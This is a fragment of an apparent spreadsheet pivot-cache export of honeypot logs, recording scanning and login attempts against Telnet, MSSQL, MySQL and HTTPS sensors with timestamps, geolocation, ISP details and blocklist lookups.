    <s v="EU"/>
    <s v="Europe"/>
    <s v="FR"/>
    <s v="France"/>
    <s v="BRE"/>
    <s v="Brittany"/>
    <s v="Ille-et-Vilaine"/>
    <s v="Saint-Grégoire"/>
    <s v="2979619"/>
    <s v="35760"/>
    <s v="48.157"/>
    <s v="-1.6881"/>
    <s v="16276"/>
    <s v="OVH SAS"/>
    <s v="OVH SAS"/>
    <s v="hosting"/>
    <s v="ONYPHE"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="GET&amp;&amp;connection&amp;&amp;NA&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'STARTTLS', 'data': 'None'}}&amp;&amp;{Data_HTTPS:{'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Connection': 'close', 'Host': '91.194.11.82', 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_HTTP:{'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Connection': 'close', 'Host': '94.131.113.33', 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_HTTP:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:587:3aca"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2071"/>
    <x v="2071"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-12T21:06:44"/>
    <d v="2025-04-12T21:06:44"/>
    <d v="2025-04-12T21:06:44"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Janpath)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6296"/>
    <s v="77.2183"/>
    <s v="17813"/>
    <s v="MTNL-AP"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="corporate"/>
    <s v="MTNL Delhi"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7839:a05a"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2072"/>
    <x v="2072"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-12T21:04:22"/>
    <d v="2025-04-12T15:04:37"/>
    <d v="2025-04-12T21:04:22"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="2007-08-01"/>
    <s v="NME-Project"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75d3:8486"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2073"/>
    <x v="2073"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-12T20:59:58"/>
    <d v="2025-04-12T20:59:58"/>
    <d v="2025-04-12T20:59:58"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_HTTPS_HC1"/>
    <s v="8443"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="VA"/>
    <s v="Virginia"/>
    <s v="Loudoun"/>
    <s v="Ashburn"/>
    <s v="4744870"/>
    <s v="20149"/>
    <s v="39.0438"/>
    <s v="-77.4874"/>
    <s v="14618"/>
    <s v="AMAZON-AES"/>
    <s v="Amazon.com, Inc."/>
    <s v="hosting"/>
    <s v="Amazon Technologies Inc"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:dd9:5b83"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2074"/>
    <x v="2074"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-12T20:47:56"/>
    <d v="2025-04-12T20:47:56"/>
    <d v="2025-04-12T20:47:56"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="17813"/>
    <s v="MTNL-AP"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b63b:f5bb"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2075"/>
    <x v="2075"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-12T20:44:27"/>
    <d v="2024-09-03T14:23:00"/>
    <d v="2025-04-12T20:44:27"/>
    <n v="9"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot Blacklisted IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_POP3_H42"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;110"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="CZ"/>
    <s v="Czechia"/>
    <s v="53"/>
    <s v="Pardubický"/>
    <s v="Chrudim District"/>
    <s v="Chrudim (Chrudim IV)"/>
    <s v="3077539"/>
    <s v="537 01"/>
    <s v="49.9563"/>
    <s v="15.7943"/>
    <s v="39906"/>
    <s v="CoProSys a.s."/>
    <s v="CoProSys a.s."/>
    <s v="business"/>
    <s v="CoProSys a.s."/>
    <s v="2006-11-28"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="NA&amp;&amp;{Data_DHCP:{'53': 'x08', '55': 'x01x02x03x04x05x06x07x08_x0009__x000a_x0bx0c_x000d_x0ex0fx10x11x12x13x14x15x16x17x18x19x1ax1bx1cx1dx1ex1f !&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:4d68:ebbc"/>
    <s v="None"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2076"/>
    <x v="2076"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-12T20:43:42"/>
    <d v="2025-04-12T20:42:39"/>
    <d v="2025-04-12T20:43:42"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="AP"/>
    <s v="Andhra Pradesh"/>
    <s v="Visakhapatanam"/>
    <s v="Visakhapatnam (Auto Nagar)"/>
    <s v="1253102"/>
    <s v="530001"/>
    <s v="17.6899"/>
    <s v="83.1936"/>
    <s v="136716"/>
    <s v="APPLE BROADBAND SERVICES PVT. LTD"/>
    <s v="Violet Broadband Pvt Ltd"/>
    <s v="residential"/>
    <s v="Violet Broadband Pvt Ltd"/>
    <s v="2016-11-22"/>
    <s v="VIOLET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6750:fa8"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2077"/>
    <x v="2077"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-12T20:39:58"/>
    <d v="2025-04-12T20:39:58"/>
    <d v="2025-04-12T20:39:58"/>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harat Sanchar Nigam Ltd"/>
    <s v="consumer"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75d6:4f09"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2078"/>
    <x v="2078"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-12T20:28:27"/>
    <d v="2025-04-12T20:27:31"/>
    <d v="2025-04-12T20:28:27"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai"/>
    <s v="Mumbai (Parel)"/>
    <s v="1275339"/>
    <s v="400012"/>
    <s v="19.0027"/>
    <s v="72.8286"/>
    <s v="17488"/>
    <s v="HATHWAY CABLE AND DATACOM LIMITED"/>
    <s v="Hathway IP over Cable Internet Access"/>
    <s v="residential"/>
    <s v="Hathway Cable and Datacom Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7449:d361"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2079"/>
    <x v="2079"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-12T20:05:25"/>
    <d v="2025-04-12T20:05:25"/>
    <d v="2025-04-12T20:05:25"/>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a:b1b3"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2080"/>
    <x v="2080"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-12T19:59:23"/>
    <d v="2025-04-12T19:58:52"/>
    <d v="2025-04-12T19:59:23"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TR"/>
    <s v="Turkey"/>
    <s v="34"/>
    <s v="Istanbul"/>
    <s v="Beyoğlu"/>
    <s v="Istanbul"/>
    <s v="745044"/>
    <s v="34122"/>
    <s v="41.0315"/>
    <s v="28.9748"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="Turkcell Iletisim Hizmetleri"/>
    <s v="business"/>
    <s v="Blackberry"/>
    <s v="2011-12-01"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b0ef:2cf7"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2081"/>
    <x v="2081"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-12T19:41:34"/>
    <d v="2025-04-12T19:41:34"/>
    <d v="2025-04-12T19:41:34"/>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f8:a77a"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2082"/>
    <x v="2082"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-12T19:38:31"/>
    <d v="2025-04-12T11:30:11"/>
    <d v="2025-04-12T19:38:31"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H9"/>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2007-08-01"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75cf:a38d"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2083"/>
    <x v="2083"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-12T19:35:43"/>
    <d v="2025-04-12T18:43:10"/>
    <d v="2025-04-12T19:35:43"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai Suburban"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="MTNL Mumbai"/>
    <s v="business"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="2004-11-30"/>
    <s v="MTNL"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3bb6:9384"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2084"/>
    <x v="2084"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-12T19:30:33"/>
    <d v="2025-04-06T02:44:52"/>
    <d v="2025-04-12T19:30:33"/>
    <n v="5"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_MYSQL_HC1"/>
    <s v="3306"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="high"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="CZ"/>
    <s v="Czechia"/>
    <s v="64"/>
    <s v="South Moravian"/>
    <s v="Brno-venkov"/>
    <s v="Ostopovice"/>
    <s v="3068805"/>
    <s v="NA"/>
    <s v="49.161"/>
    <s v="16.5455"/>
    <s v="9009"/>
    <s v="M247 Europe SRL"/>
    <s v="M247 Europe Infra"/>
    <s v="hosting"/>
    <s v="M247 Ltd Prague"/>
    <s v="1991-01-23"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MYSQL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:9246:8176"/>
    <s v="C-I"/>
    <s v="high"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2085"/>
    <x v="2085"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-12T19:29:23"/>
    <d v="2025-04-12T19:29:23"/>
    <d v="2025-04-12T19:29:23"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'spamsources.fabel.dk': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="111"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Block N)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6309"/>
    <s v="77.2229"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="corporate"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75fe:16c8"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2086"/>
    <x v="2086"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-12T19:27:38"/>
    <d v="2025-04-12T19:27:38"/>
    <d v="2025-04-12T19:27:38"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Block N)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6309"/>
    <s v="77.2229"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="corporate"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75e9:8c32"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2087"/>
    <x v="2087"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-12T19:14:50"/>
    <d v="2025-04-12T19:13:07"/>
    <d v="2025-04-12T19:14:50"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="True"/>
    <s v="{'dnsbl-2.uceprotect.net': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="TN"/>
    <s v="Tamil Nadu"/>
    <s v="Tiruppur"/>
    <s v="Tirupur"/>
    <s v="1254348"/>
    <s v="NA"/>
    <s v="11.1154"/>
    <s v="77.3546"/>
    <s v="142439"/>
    <s v="ALPHA FIBER NET"/>
    <s v="Alpha Fiber NET"/>
    <s v="residential"/>
    <s v="Alphafnet"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:67a8:f01e"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2088"/>
    <x v="2088"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-12T18:29:56"/>
    <d v="2025-04-12T17:59:20"/>
    <d v="2025-04-12T18:29:56"/>
    <n v="27"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KL"/>
    <s v="Kerala"/>
    <s v="Ernakulam"/>
    <s v="Alangad"/>
    <s v="11184118"/>
    <s v="NA"/>
    <s v="10.1019"/>
    <s v="76.291"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="residential"/>
    <s v="BSNL GSM NorthZone"/>
    <s v="2007-08-01"/>
    <s v="BSNL-GSM-NorthZone"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75db:3d1f"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
